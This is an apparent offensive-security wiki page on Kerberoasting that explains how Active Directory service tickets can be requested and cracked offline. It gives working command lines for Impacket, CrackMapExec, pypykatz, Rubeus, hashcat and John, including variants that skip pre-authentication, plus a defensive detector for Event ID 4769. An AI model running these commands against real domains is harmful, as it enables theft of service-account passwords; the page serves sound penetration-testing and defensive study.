Kerberoast
MITRE ATT&CK™ Sub-technique T1558.003

Theory

When asking the KDC (Key Distribution Center) for a Service Ticket (ST), the requesting user needs to send a valid TGT (Ticket Granting Ticket) and the SPN (Service Principal Name) of the wanted service. If the TGT is valid and the SPN exists, the KDC sends the ST back to the requesting user.
The ST is encrypted with the requested service account's secret key (its NT hash when RC4 is used). If an attacker has a valid TGT and knows an SPN for a service, they can request an ST for that service and crack it offline later in an attempt to recover the service account's password.
In most situations, service accounts are machine accounts, which have very complex, long and random passwords. But if a service account with a human-defined password has an SPN set, attackers can request an ST for that service and attempt to crack it offline. This is Kerberoasting.

Practice

Unlike ASREProasting, this attack can only be carried out with a prior foothold (valid domain credentials), except in the Kerberoasting without pre-authentication scenario.
UNIX-like
The Impacket script GetUserSPNs (Python) can perform all the necessary steps to request an ST for a service given its SPN (or name) and valid domain credentials.
The attack can be performed without knowing any of the target account's SPNs, but the target account still needs at least one SPN set.
# with a password
GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'

# with an NT hash
GetUserSPNs.py -outputfile kerberoastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'
This can also be achieved with CrackMapExec (Python).
crackmapexec ldap $TARGETS -u $USER -p $PASSWORD --kerberoasting kerberoastables.txt --kdcHost $KeyDistributionCenter
Using pypykatz (Python) it is possible to request an RC4-encrypted ST even when AES encryption is enabled (provided RC4 is still accepted, of course). The tool features an -e flag which specifies what encryption type should be requested (defaults to 23, i.e. RC4). Cracking $krb5tgs$23 (RC4) hashes takes far less time than $krb5tgs$18 (AES256) ones, since the AES key is derived from the password through PBKDF2 while the RC4 key is simply the NT hash.
pypykatz kerberos spnroast -d $DOMAIN -t $TARGET_USER -e 23 'kerberos+password://DOMAIN\username:password@$KeyDistributionCenter'
Windows
Rubeus (C#) can be used for that purpose.
Rubeus.exe kerberoast /outfile:kerberoastables.txt
Hashcat and John the Ripper can then be used to attempt cracking the hashes.
hashcat -m 13100 kerberoastables.txt $wordlist
john --format=krb5tgs --wordlist=$wordlist kerberoastables.txt
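From the defender's side, every ST request above is recorded by the domain controller as a Kerberos service ticket operation (Windows Security Event ID 4769). The following is an added example, not code from this page or from any of the tools it describes: it scans constructed 4769 records for the two signals this section describes, RC4 (0x17, i.e. $krb5tgs$23) tickets issued for non-machine service accounts, and a single requester pulling tickets for many distinct services in a short window. The record layout, the time window and the threshold are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample 4769 records (not real logs): time, requesting account,
# service account the ST was issued for, TicketEncryptionType, client IP.
SAMPLE_4769 = [
    ("2022-09-28T10:00:01", "alice", "WS01$",      "0x12", "10.0.0.5"),
    ("2022-09-28T10:00:03", "bob",   "svc_sql",    "0x17", "10.0.0.9"),
    ("2022-09-28T10:00:04", "bob",   "svc_web",    "0x17", "10.0.0.9"),
    ("2022-09-28T10:00:04", "bob",   "svc_backup", "0x17", "10.0.0.9"),
    ("2022-09-28T10:00:05", "bob",   "svc_iis",    "0x17", "10.0.0.9"),
    ("2022-09-28T10:05:00", "carol", "svc_sql",    "0x12", "10.0.0.7"),
]

RC4_HMAC = "0x17"          # TicketEncryptionType for RC4, i.e. $krb5tgs$23
WINDOW = timedelta(minutes=5)   # assumed burst window
SPN_THRESHOLD = 3          # assumed: distinct user service accounts per requester per window


def is_user_service_account(service):
    """Machine accounts end with '$'; krbtgt shows up on every TGS exchange."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def detect_kerberoast(events):
    """Return alerts: RC4 STs for user service accounts, and bursts of ST requests."""
    alerts = []
    per_user = defaultdict(list)   # requester -> [(time, service)]
    for ts, user, service, etype, ip in events:
        if not is_user_service_account(service):
            continue   # tickets for machine accounts are normal and not crackable in practice
        t = datetime.fromisoformat(ts)
        per_user[user].append((t, service))
        if etype == RC4_HMAC:
            # An RC4 ticket for a user-backed service account is the classic Kerberoast signal
            alerts.append(("rc4_service_ticket", user, service, ip))
    for user, reqs in per_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            services = {s for t, s in reqs[i:] if t - t0 <= WINDOW}
            if len(services) >= SPN_THRESHOLD:
                # One principal collecting STs for many services at once (GetUserSPNs, Rubeus)
                alerts.append(("st_request_burst", user, len(services), None))
                break
    return alerts
```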

Kerberoast w/o pre-authentication

In September 2022, Charlie Clark explained how Service Tickets could be obtained through AS-REQ requests (which are usually used for TGT requests) instead of the usual TGS-REQ. He demonstrated (and implemented) how to abuse this in a Kerberoasting scenario.
If an attacker knows of an account for which pre-authentication isn't required (i.e. an ASREProastable account), as well as one (or multiple) service accounts to target, a Kerberoast attack can be attempted without controlling any Active Directory account (since pre-authentication won't be required).
UNIX-like
In this scenario, the Impacket script GetUserSPNs (Python) can request STs for the listed services through AS-REQs, using the account that doesn't require pre-authentication in place of valid domain credentials.
At the time of writing, Sept. 28th 2022, the pull request (#1413) adding the -no-preauth option for GetUserSPNs.py is pending.
GetUserSPNs.py -no-preauth "bobby" -usersfile "services.txt" -dc-host "DC_IP_or_HOST" "DOMAIN.LOCAL"/
usersfile example
srv01
cifs/srv02.domain.local
cifs/srv02
Windows
Rubeus (C#) can be used for that purpose.
At the time of writing, Sept. 28th 2022, the pull request (#139) adding the /nopreauth option for Rubeus' kerberoast command is pending.
Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"DOMAIN.LOCAL" /dc:"DC01.DOMAIN.LOCAL" /nopreauth:"nopreauth_user" /spn:"target_service"

Targeted Kerberoasting

If an attacker controls an account with the rights to add an SPN to another account (GenericAll, GenericWrite), that right can be abused to make the other account vulnerable to Kerberoast (see exploitation).
When controlling a member of the Account Operators group, targeted Kerberoasting can be conducted against the whole domain (see exploitation).

Resources

Kerberos in Active Directory (hackndo)
How Attackers Use Kerberos Silver Tickets to Exploit Systems (Active Directory Security)
New Attack Paths? AS Requested Service Tickets (Semperis)